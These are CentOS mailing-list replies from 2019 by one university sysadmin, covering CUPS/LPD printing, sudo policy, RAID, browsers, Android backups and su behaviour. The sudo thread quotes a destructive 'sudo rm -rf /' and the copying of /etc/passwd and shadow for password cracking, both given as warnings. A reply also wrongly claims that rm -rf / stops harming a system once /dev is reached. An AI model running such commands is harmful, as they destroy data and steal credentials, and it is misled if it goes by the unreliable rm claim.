Re: [CentOS] OT: mostly gone
On 2019-08-20 14:07, Fred Smith wrote: On Tue, Aug 20, 2019 at 09:33:22AM -0400, mark wrote: Hi, folks, Well, it's ten years that I've been on this list, right when I started this job. But, it's time to move on... I'm retiring. (Yeah, that old.) Congratulations on making it that far, Mark! I'm also retired, but keep getting calls from my former employer since they never bothered to have anyone else learn what it was I did. :( Well, it is much easier to do something from scratch [you way], that to learn what and how another person did to modify it for new requirements. And faster. I know it on my hide. At least they pay me for that... So, though I'll be part time for a few months, and running CentOS at home (in spite of my manager's pushing me to do Ubuntu). This list is *so* much more useful than any of the ones I've seen for Ubuntu, or much else. I'm very much looking forward to C 8. One more thing: I know I've been over the top on ethics "I work for a US federal contractor, but not saying more", even though there's folks like Todd, who's military. Anyway, now that I'm out, today, my line (in person) was, "I'm with the federal goverment, and I'm here to help you." Then, after they ask if I'll have to kill them, I can say, no: I've been with the NIH, and so, yes, I really meant it. I'll show up occasionally, but not like I have been. So long, and thanks for all the fish. mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Giving full administrator privileges through sudo on production systems
> On Aug 16, 2019, at 11:12 PM, John Pierce wrote: > > On Fri, Aug 16, 2019 at 8:39 PM Bagas Sanjaya wrote: > >> Why did you say it is wrong to give full admin privileges to random users? >> > > > $ sudo rm -rf / > I like this one. Long-long ago it was one of the “tricky” questions at the UNIX admin test (exam). Basically, no matter how devastating that may sound, the command only will remove what is (alphabetically it was that time) before /dev/[root_device]. Once the device root filesystem lives on is removed from /dev, no further damage is done. So, you will be able to mount drive on another machine and get your /etc, /home, /var, /usr/local intact ;-) Asking that question other people gave me (an them usually) a lot of fun. Valeri > $ sudo > > $ sudo cp /etc/{passwd,shadow} $home; (run john-the-ripper against > passwd/shadow files). > > etc etc etc. > > > > -- > -john r pierce > recycling used bits in santa cruz > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Giving full administrator privileges through sudo on production systems
> On Aug 16, 2019, at 6:21 AM, Warren Young wrote: > > On Aug 15, 2019, at 11:04 PM, Bagas Sanjaya wrote: >> >> Based on above cases, is it OK to give group of random users full >> administrator privileges using sudo, by adding them to sudoers with ALL >> privileges? Should sudoers call customer service number instead of sysadmin >> when something breaks? > > sudo is a tool for expressing and enforcing a site’s policies regarding > superuser privilege. > > If your sudo configuration expresses and enforces those policies the way you > want it to, then the configuration is correct. If it does not, then fix it. Incidentally, sudo stands for substitute user do. Meaning: executing something as a different user. I keep repeading it to proficient Linux users who sometimes need my help too, amazingly they all percieve it as a super user do, not as a substitute user do. Even though “man sudo” says in the first line: - execute a command as another user… Just mentioning. Valeri > sudo doesn’t tell you what your policies should be. > > We can suggest policies to you, but not based only on the information you’ve > just given us. To properly advise you, we’d need to know your threat models, > the risk assessments, and more. In short, we’d have to become your system > administrators. > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Win 10 and C 6 CUPS
On 2019-08-07 16:21, mark wrote: Valeri Galtsev wrote: On Aug 6, 2019, at 5:41 PM, mark wrote: Is there any way, other than installing CUPS on windows, to get the damn Win laptop to print to my C 6 box, which has CUPS running and a USB laserjet? Since forever (ah, about Win 2000) Windows knows UNIX printing. Making windows box talking to UNIX print server its native language makes the most robust setup. It is, however not turned on by default. So (adjust to your version as Microsoft reshuffles location of all the same tools with ever release): Control Panel —> Programs and Features —> Enable/disable features In the long list there is Printing, click on it to expand, and enable LPR and LPD A!!! That I had no clue about (I do *not* do Windows). Now when creating printer choose to create new local port, choose LPR (or does it say LPD?) port and give your CUPS server name, and queue name. The rest is as usual (choose printer driver, I prefer postscript ones). Dumb question: queue name - is that like printer name, in the CUPS admin web page? Yes,correct. Since forever it was called queue name, GUI tools often (or sometimes?) call it printer name, pretty much following M$ tradition. In CUPS web interface on page "Printers" first column title calls it explicitly "Queue name". Incidentally, I use CUPS' own web interface, I never use Linux's print configuration tools (part of Linux admin tools). Well, I used them once somewhere around RedHat 7.1, and was quite unhappy, so I use CUPS web interface: http://localhost:631 on any Linuxes I have to set up printers on. I highly recommend it. I hope, this helps. Valeri You should be done now. Incidentally, I use CUPS with LPD listening on the server side, as the last makes the most robust setup for variety of clients. We have FreeBSD server, and client systems are: FreeBSD, Linux (CentOS, Debian, Ubuntu), Windows, MacOS. I hope, this helps. We'll see when my lady gets back from SC next week. Thanks very much. mark Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Win 10 and C 6 CUPS
> On Aug 6, 2019, at 5:41 PM, mark wrote: > > Is there any way, other than installing CUPS on windows, to get the damn Win > laptop to print to my C 6 box, which has CUPS running and a USB laserjet? > Since forever (ah, about Win 2000) Windows knows UNIX printing. Making windows box talking to UNIX print server its native language makes the most robust setup. It is, however not turned on by default. So (adjust to your version as Microsoft reshuffles location of all the same tools with ever release): Control Panel —> Programs and Features —> Enable/disable features In the long list there is Printing, click on it to expand, and enable LPR and LPD Now when creating printer choose to create new local port, choose LPR (or does it say LPD?) port and give your CUPS server name, and queue name. The rest is as usual (choose printer driver, I prefer postscript ones). You should be done now. Incidentally, I use CUPS with LPD listening on the server side, as the last makes the most robust setup for variety of clients. We have FreeBSD server, and client systems are: FreeBSD, Linux (CentOS, Debian, Ubuntu), Windows, MacOS. I hope, this helps. Valeri > mark > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] 32-bit CentOS
On 2019-07-09 15:01, MAILIST wrote: On Tue, 9 Jul 2019 at 14:40, Dave Close wrote: It appears that CentOS 7 was the last one with a 32-bit version. I'm trying to install it on an older laptop and having some trouble. I tried to resurrect a 32-bit desktop with a Pentium 4 processor by installing CentOS 7 32-bit version. Everything installed OK, but after the first boot, the performance was unusable. And, the X11 would crash repeatedly. CentOS 7-32 is completely useless. CentOS will not be good choice of system for this case. Linux grows in its demands to hardware rather fast. Not as fast as MS Windows does (I remember when 2000 was released someone stuck "bloated pig" to it ;-) Much better choice would be FreeBSD (or any of BSD descendants, e.g. netbsd). I hope this helps. Valeri Then, I tried Ubuntu 16-32 with the Gnome desktop. No crashes, but the performance was unusable, although much better than CentOS 7-32. Then, I tried Lubuntu 18-32, and I have a usable system now. Lubuntu is Ubuntu with a light-weight desktop designed for computers with limited resources. I have also installed Xubuntu 12 on a laptop with a Pentium M processor (pre-PAE capability for extended memory addressing). It performed acceptably. Xubuntu is another light-weight Linux with the XFCE desktop. Todd Merriman ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] using RedHat binary packages?
On July 3, 2019 1:43:40 AM CDT, Harald Dunkel wrote: >Hi folks, > >AFAIK CentOS uses RedHat's source RPMs for building the next CentOS >release. I am not sure about the bootstrap procedure and the infra- >structure packages, so lets put these corner cases aside. > >RedHat's "regular" binary and source packages are based on open source >(GPL2, GPL3, Apache license, whatever). For building the binary RPMs >other open source RPMs with compatible license conditions are used. > >My question is: > >Are RedHat's binary RPMs "poisoned" somehow, making it impossible for >CentOS to redistribute RedHat's *binary* packages without going to >jail? > RHEL binary packages are only available to paid customers who are explicitly prohibited to redistribute them. It usually is an easy search and short reading one has to do instead of bugging mail list. Valeri > >Every insightful comment is highly appreciated. > >Regards >Harri >___ >CentOS mailing list >CentOS@centos.org >https://lists.centos.org/mailman/listinfo/centos Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] HPE ProLiant - support Linux Vendor Firmware Service ?
On 2019-07-01 14:15, mark wrote: Frank Cox wrote: On Mon, 1 Jul 2019 19:38:29 +0100 lejeczek via CentOS wrote: I also a few years ago got Dell's tech support telling me to do MS-DOS stuff in order to update BIOS. So what's wrong with using DOS to update firmware? DOS is a small and simple program loader that's unlikely to require much in the way of hardware to work and is unlikely to be infected by a virus in today's world. Would you rather have to boot a mulit-gigabyte image of who-knows-what that does ghawd-knows-what for what should be simple task? The above is really weird. From CentOS 5, 6, and 7, I've run Dell's firmware update from a running system, no OMSA. Updates with no problems. I really agree with Frank. The smaller the thing your run flash/firmware burner is the better. So, rudimentary DOS is what I would prefer given a choice. And I have to say I really like Dell's firmware installer - it scans the system, and then *tells* you that a) it is for that system, and b) that this is newer than the current, and do you want to install. Though I do note that tastes differ. Valeri mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] raid 5 install
On 2019-07-01 10:10, mark wrote: I haven't been following this thread closely, but some of them have left me puzzled. 1. Hardware RAID: other than Rocket RAID, who don't seem to support a card more than about 3 years (i used to have to update and rebuild the drivers), anything LSI based, which includes Dell PERC, have been pretty good. The newer models do even better at doing the right thing. 2. ZFS seems to be ok, though we were testing it with an Ubuntu system just a month or so ago. Note: ZFS with a zpoolZ2 - the equivalent of RAID 6, which we set up using the LSI card set to JBOD - took about 3 days and 8 hours for backing up a large project, while the same o/s, but with xfs on an LSI-hardware RAID 6, took about 10 hours less. Hardware RAID is faster. 3. Being in the middle of going through three days of hourly logs and the loghost reports, and other stuff, from the weekend (> 600 emails), I noted that we have something like 50 mdraids, and we've had very little trouble with them, almost all are either RAID 1 or RAID 6 (we may have a RAID 5 left), except for the system that had a h/d fail, and another starting to through errors (I suspect the server itself...). The biggest issue for me is that when one fails, "identify" rarely works, which means use smartctl or MegaCli64 (or the lsi script) to find the s/n of the drive, then guess... and if that doesn't work, bring the system down to find the right bloody bad drive. In my case I spend a bit of time before I roll out the system, so I know which physical drive (or which tray) the controller numbers with which number. They stay the same over the life of the system, those are just physical connections. Then when the controller tells drive number "N" failed, I know which tray to pull. Valeri But... they rebuild, no problems. Oh, and I have my own workstation at home on a mdraid 1. mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] raid 5 install
On 2019-07-01 10:01, Warren Young wrote: On Jul 1, 2019, at 8:26 AM, Valeri Galtsev wrote: RAID function, which boils down to simple, short, easy to debug well program. I didn't intend to start software vs hardware RAID flame war when I joined somebody's else opinion. Now, commenting with all due respect to famous person who Warren Young definitely is. RAID firmware will be harder to debug than Linux software RAID, if only because of easier-to-use tools. I myself debug neither firmware (or "microcode", speaking the language as it was some 30 years ago), not Linux kernel. In both cases it is someone else who does the debugging. You are speaking as the person who routinely debugs Linux components. I still have to stress, that in debugging RAID card firmware one has small program which this firmware is. In the case of debugging EVERYTHING that affects reliability of software RAID, on has to debug the following: 1. Linux kernel itself, which is huge; 2. _all_ the drivers that are loaded when system runs. Some of the drivers on one's system may be binary only, like NVIDIA video card drives. So, even for those who like Warren can debug all code, these still are not accessible. All of the above can potentially panic kernel (as they all run in kernel context), so they all affect reliability of software RAID, not only the chunk of software doing software RAID function. Furthermore, MD RAID only had to be debugged once, rather that once per company-and-product line as with hardware RAID. Alas, MD RAID itself not the only thing that affects reliability of software RAID. Panicking kernel has grave effects on software RAID, so anything that can panic kernel had also to be debugged same thoroughly. And it always have to be redone once changed to kernel or drivers are introduced. I hope you’re not assuming that hardware RAID has no bugs. It’s basically a dedicated CPU running dedicated software that’s difficult to upgrade. That's true, it is dedicated CPU running dedicated program, and it keeps doing it even if the operating system crashed. Yes, hardware itself can be unreliable. But in case of RAID card it is only the card itself. Failure rate of which in my racks is much smaller that overall failure rate of everything. In case of kernel panic, any piece of hardware inside computer in some mode of failure can cause it. One more thing: apart from hardware RAID "firmware" program being small and logically simple, there is one more factor: it usually runs on RISC architecture CPU, and introduce bugs programming for RISC architecture IMHO is more difficult that when programming for i386 and amd64 architectures. Just my humble opinion I carry since the time I was programming. if kernel (big and buggy code) is panicked, current RAID operation will never be finished which leaves the mess. When was the last time you had a kernel panic? And of those times, when was the last time it happened because of something other than a hardware or driver fault? If it wasn’t for all this hardware doing strange things, the kernel would be a lot more stable. :) Yes, I half expected that. When did we last have kernel crash, and who of us is unable to choose reliable hardware, and unable to insist that our institution pays mere 5-10% higher price for reliable box than they would for junk hardware? Indeed, we all run reliable boxes, and I am retiring still reliably working machines of age 10-13 years... However, I would rather suggest to compare not absolute probabilities, which, exactly as you said, are infinitesimal. But with relative probabilities, I still will go with hardware RAID. You seem to be saying that hardware RAID can’t lose data. You’re ignoring the RAID 5 write hole: https://en.wikipedia.org/wiki/RAID#WRITE-HOLE Neither of our RAID cards runs without battery backup. If you then bring up battery backups, now you’re adding cost to the system. And then some ~3-5 years later, downtime to swap the battery, and more downtime. And all of that just to work around the RAID write hole. You are absolutely right about system with hardware RAID being more expensive than that with software RAID. I would say, for "small scale big storage" boxes (i.e. NOT distributed file systems), hardware RAID adds about 5-7% of cost in our case. Now, with hardware RAID all maintenance (what one needs to do in case of single failed drive replacement routine) takes about 1/10 of a time necessary do deal with similar failure in case of software RAID. I deal with both, as it historically happened, so this is my own observation. Maybe software RAID boxes I have to deal with are too messy (imagine almost two dozens of software RAIDs 12-16 drives each on one machine; even bios runs out of numbers in attempt to enumerate all drives...) No, I am not taking the blame for building box like that ;-) All in all, si
Re: [CentOS] raid 5 install
On July 1, 2019 8:56:35 AM CDT, Blake Hudson wrote: > > >Warren Young wrote on 6/28/2019 6:53 PM: >> On Jun 28, 2019, at 8:46 AM, Blake Hudson wrote: >>> Linux software RAID…has only decreased availability for me. This has >been due to a combination of hardware and software issues that are are >generally handled well by HW RAID controllers, but are often handled >poorly or unpredictably by desktop oriented hardware and Linux >software. >> Would you care to be more specific? I have little experience with >software RAID, other than ZFS, so I don’t know what these “issues” >might be. > >I've never used ZFS, as its Linux support has been historically poor. >My >comments are limited to mdadm. I've experienced three faults when using > >Linux software raid (mdadm) on RH/RHEL/CentOS and I believe all of them > >resulted in more downtime than would have been experienced without the >RAID: > 1) A single drive failure in a RAID4 or 5 array (desktop IDE) >caused the entire system to stop responding. The result was a degraded >(from the dead drive) and dirty (from the crash) array that could not >be >rebuilt (either of the former conditions would have been fine, but not >both due to buggy Linux software). > 2) A single drive failure in a RAID1 array (Supermicro SCSI) caused > >the system to be unbootable. We had to update the BIOS to boot from the > >working drive and possibly grub had to be repaired or reinstalled as I >recall (it's been a long time). > 3) A single drive failure in a RAID 4 or 5 array (desktop IDE) was >not clearly identified and required a bit of troubleshooting to >pinpoint >which drive had failed. > >Unfortunately, I've never had an experience where a drive just failed >cleanly and was marked bad by Linux software RAID and could then be >replaced without fanfare. This is in contrast to my HW raid experiences > >where a single drive failure is almost always handled in a reliable and > >predictable manner with zero downtime. Your points about having to use >a >clunky BIOS setup or CLI tools may be true for some controllers, as are > >your points about needing to maintain a spare of your RAID controller, >ongoing driver support, etc. I've found the LSI brand cards have good >Linux driver support, CLI tools, an easy to navigate BIOS, and are >backwards compatible with RAID sets taken from older cards so I have no > >problem recommending them. LSI cards, by default, also regularly test >all drives to predict failures (avoiding rebuild errors or double >failures). +1 in favor of hardware RAID. My usual argument is: in case of hardware RAID dedicated piece of hardware runs a single task: RAID function, which boils down to simple, short, easy to debug well program. In case of software RAID there is no dedicated hardware, and if kernel (big and buggy code) is panicked, current RAID operation will never be finished which leaves the mess. One does not need computer science degree to follow this simple logic. Valeri > > >___ >CentOS mailing list >CentOS@centos.org >https://lists.centos.org/mailman/listinfo/centos Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Alternitives to Firefox...
On 2019-06-26 15:39, mark wrote: Robert Heller wrote: OK, I recently ugraded to the current ESR release of Firefox for CentOS 6. And I am having problems with the user interface (basically it has become hard [for me] to use). What alternitives are there? (Chrome and Chromium are not possible with CentOS, and Chrome and Chromium are actually worse). What's the problems? I just upgraded last week, and the STUPID MORONS My observation is: the bizarre at Mozilla Foundation started [quite a while ago] when one of the people who was here as a student (and I knew him personally) came to them as a production director. Then they started piling up extra "features", rushing new "releases", none of which does live up to the name "release", they are not debugged enough... just take a look how often security update for firefox or thunderbird are released. Since then I am looking for the replacement for firefox, and I still can not find one. Midory though good enough, and is my second choice on my FreeBSD workstation, still can not replace firefox for me. Don't get me started about chrome, chromium and friends... though I have to use chromium for specific purpose: to have browser that can pretend to be on smarthone. Palemoon is just a rebuild of Firefox. Tor browser, though it is rebuilt of firefox as well, is my choice when I prefer to go places I don't want my network provider put into their database associated with my name. I'm sure many of us do similar things in a course of out job duties. Vivaldy almost worked out as firefox replacement on MS Windows systems for me, but later I changed my mind. I had really short, like touch and go, experience with opera. And I'm not mentioning Safari which is my second choice (after firefox) on macintosh. (Well, safari, as many other things on macintosh you sometimes need to trick into doing what you actually want it to do). I guess, we all (old guys) still keep our warm feelings to Netscape Navigator. Valeri made the arrows in the scrollbars go away, had to search and find a gtk config file I needed to create. A month or so ago, they upgraded, and I had to find out that I had to edit about:config to change the booleans on signature to false. mark ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Alternitives to Firefox...
On 2019-06-26 15:31, Robert Heller wrote: At Thu, 27 Jun 2019 04:12:07 +0800 CentOS mailing list wrote: On Wed, 2019-06-26 at 15:58 -0400, Robert Heller wrote: OK, I recently ugraded to the current ESR release of Firefox for CentOS 6. And I am having problems with the user interface (basically it has become hard [for me] to use). What alternitives are there? (Chrome and Chromium are not possible with CentOS, and Chrome and Chromium are actually worse). You can give Midori a try Excessively clever website, but there is no working download link for either source or binary for Linux... It is supposed to be available for Linux, but it does not appear to actually be available. You can download by clicking on the "Zip" link, here is direct link I get from their website: https://github.com/midori-browser/core/releases/download/v6/midori-v6.0.tar.gz It should be easy to build, I use it on mu FreeBSD workstation (as a second choice of a browser); I've installed it as FreeBSD package, so I didn't read build instruction/dependencies, but this may add to whatever build instruction the ship with source (it is for FreeBSD but it gives you all information you need): https://www.freshports.org/www/midori/ Good luck! Valeri Content-Description: This is a digitally signed message part -BEGIN PGP SIGNATURE- iQEzBAABCAAdFiEE1NmgX7wrrpfbBP5dWqpQSG2Cj/YFAl0T0ZgACgkQWqpQSG2C j/ZHUwf/cZnrnoYjvaNgYiilQzEWfUAOcEYi046hQ8kTmBKfO6c4sdpPSMWTPoyt xAuDLQEO//DKNXGH1QpRpcwWbmEp2GGsYypLQol8NDfcDjBQ/tLYb+Dy+fvHpPAh t5Lamnc3AblH3GA1jNm3pZlIwW6J+Z9Yy/Jqrw5xDGOwvzT2w6CafzKNXS2qPQrQ TT75lgSooZoE8GVVM04N82YnXHkz2hl29G38OgvrcXaftGV1zKWpRfmrhRU9+5I1 SMg3zzXj74D0L5cI2m7LJbDFOYGu3RzZ2pNd0rR607Nde9xotMUCFhLZB5X97kzD iNe8+KlpJ1ERC7pESAIg9o8Ufty65g== =imVA -END PGP SIGNATURE- MIME-Version: 1.0 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: android phone backup NOT to google cloud question
On 2019-05-15 09:37, Walter H. wrote: On 15.05.2019 16:21, Valeri Galtsev wrote: Dear All, My apologies for OT question. I wonder if someone of Android smartphone owners backs up their device and user/application data NOT to google cloud. no problem, host your own nextcloud and get the nextcloud app; also no need of having the contacts and/or calendar at google ... Thanks, Walter. I do host our own: owncloud (the one nextcloud forked off), and I do have my important data synced through it. There are though on android device applications that you can not configure to store data in different location from what programmer programed in. These go to /data/data on android, and I can do nothing about these. Say, if I want that place to be inside what ownclud (nextcloud) syncs, permissions of android system will stop me from accessing it on the device anyway. Overcoming which will need rooting the system. Dough. Thanks anyway! and the most important: you can select by this criteria; other things like camera, ... are less important, its a phone ... I know, Apple iDevices are a bit better data wise, and Apple has [quite] a bit better reputation, though these are still Apple devices, not yours ;-) if better means overpriced then you are right; good androids are for less then 200 usd, iPhones start at 500 usd There may be yet even more "overpriced" device available some day: https://puri.sm/products/librem-5/ which has no proprietary code in it whatsoever, and being divorced from big brother (with uncounted and unaccounted for taxpayers money), it definitely costs what it costs to be built for small consumer base and without portion of cost covered by some other parties... Anyway, Apple device gives cost of its built for big consumer base without portion of cost covered by other interested parties... In other words, the old truth stands: you pay anyway (if not money, then by something else). Valeri Any advise, anybody? Thanks a lot in advance! Valeri ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] OT: android phone backup NOT to google cloud question
Dear All, My apologies for OT question. I wonder if someone of Android smartphone owners backs up their device and user/application data NOT to google cloud. I just had to get new smartphone, and discovered that short of rooting device or unlocking bootloader and flashing one of "un-googled" android builds I can not find the way to back up everything. To my storage, NOT TO GOOGLE CLOUD that is. adb lets me back up system and applications (and data on add-on flash card), but not application data stored in internal storage (say, off-line maps downloaded by offline map application). I knew when buying android ("gogloid") I'm not becoming an owner of the device. I also know that after flashing one of "un-googled" systems (waiving off the warranty on that device) I will not get rid of all google code. There is proprietary chunk of it the android kernel... Plus proprietary drivers ("blobs" is the word android people use if I'm not mistaken). I also have seen google "appliances" on several "big" (say, class B) networks, not registered in DNS, carrying non-routable ("private address space") IP addresses, which are resolved as google by DNS servers provided to DHCP clients inside these networks... So, no, I have no illusion about getting away from almighty big brother. I just want my data backed up to my device, accessible to me and usable for recovery without need of network access, and existence of some third party servers on the network. I know, Apple iDevices are a bit better data wise, and Apple has [quite] a bit better reputation, though these are still Apple devices, not yours ;-) Any advise, anybody? Thanks a lot in advance! Valeri Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] root .bash_profile?
On 2019-05-14 09:07, Bee.Lists wrote: On May 14, 2019, at 8:14 AM, Jonathan Billings wrote: On Tue, May 14, 2019 at 07:45:55AM -0400, Bee.Lists wrote: I addressed this in the thread. And we continue to tell you that you're wrong. su behaves the same way when switching to any other user as it does for root. Stop spreading misinformation. Not big on reading what I put. It’s all there. Regardless how often you say ‘su’ is the same as ‘su fred’, it is not. Stop spreading misinformation. Look, in the following four command lines executed in the shell: su su fred su - fred su -l fred - in all four of them: "su" is a command "fred" is an argument (wherever it is present) "-" (surrounded by spaces on both sides) and "-l" are command options This is standard terminology used in UNIX, Linux, etc for several decades. And finally, RTFM, please. And also, can we close this thread, please. Valeri Cheers, Bee ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] root .bash_profile?
On 2019-05-14 07:14, Jonathan Billings wrote: On Tue, May 14, 2019 at 07:45:55AM -0400, Bee.Lists wrote: I addressed this in the thread. And we continue to tell you that you're wrong. su behaves the same way when switching to any other user as it does for root. Stop spreading misinformation. Sorry, Jonathan, that I replying _your_ message, my reply has nothing to do with it of any of your other posts, but rather with some posts by some other posters. I really have to say this: This whole thread - some posts in it that is - reminds me the old truth: RTFM. Namely, Read The F.. (damn) Manual! It is really hard to help those who don't care to read the man page. No matter how many times you repeat that su stands for "substitute user", and that the command as usually may have various options, and "-" is one of these options, and what is the difference between invoking command with or without it. I would suggest that continuing this thread is counter-productive. Valeri PS pasting excerpt from "man su" on my FreeBSD workstation: SU(1) FreeBSD General Commands Manual SU(1) NAME su - substitute user identity SYNOPSIS su [-] [-c class] [-flms] [login [args]] ... -l Simulate a full login. ... - (no letter) The same as -l. -- ++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] root .bash_profile?
On 2019-05-13 16:55, J Martin Rushton via CentOS wrote: On 13/05/2019 22:25, Pete Biggs wrote: On Mon, 2019-05-13 at 16:20 -0400, Bee.Lists wrote: It may not be "just another user", but it *is* a user as much as your login username is a user. You could assign your own username a UID of 0, and it would have the same privileges as 'root', but it would still act as your username. NOTE: doing this is NOT recommended, do not do it, seriously, do NOT do it. P. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Shame that "security experts" regularly recommend using another name for the root account - security through obscurity anyone? Not here, sorry ;-) Valeri PS Script kiddies will get UID=0, not username=root, when succeed in pretty much anything they use to elevate privileges on attacked machine. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] root .bash_profile?
On 2019-05-13 16:25, Pete Biggs wrote: On Mon, 2019-05-13 at 16:20 -0400, Bee.Lists wrote: On May 13, 2019, at 2:46 PM, Pete Biggs wrote: First, the ~ which might not apply to root. Why do you think that? '~' is just shell shorthand for user's home directory. root quite often isn’t recognized as a proper user. ~/.bash_profile isn’t loaded because it’s not a normal login shell when entering `su`. If you switch to any other user using 'su', then their .bash_profile isn't loaded (unless you specify that it's a login shell). Whole environment of user that invoked su is "inherited" unless it is specified on commend line to get login environment of user one does su into. 'su' doesn't mean "super user" it means "substitute user" - the default happens to be user UID 0. Thanks Pete! This really needs to be repeated, even though whenever su is mentioned I repeat that to my users that it means "substitute user", but now that you mentioned it here it makes this whole thread clear. Valeri Second, it’s a “personal” init file, which also might not pertain to root. root is just as much a user as anyone else, albeit one with special privileges because they are UID 0. So I can’t assume it’s just another user. It may not be "just another user", but it *is* a user as much as your login username is a user. You could assign your own username a UID of 0, and it would have the same privileges as 'root', but it would still act as your username. NOTE: doing this is NOT recommended, do not do it, seriously, do NOT do it. Going from user to root (su) might not initiate a login shell. I’m not clear on this. Are you logging in? (i.e. typing the username and password at a login prompt.) If not, then it's not a login shell. Isn’t moving from my own user using su, then prompted for password count as a login? No. It doesn't. The password prompt is for authentication, not logging in. man su doesn’t apply to root with regards to the files loaded up upon login. Could you explain what you mean by that. P. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos -- ++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] root .bash_profile?
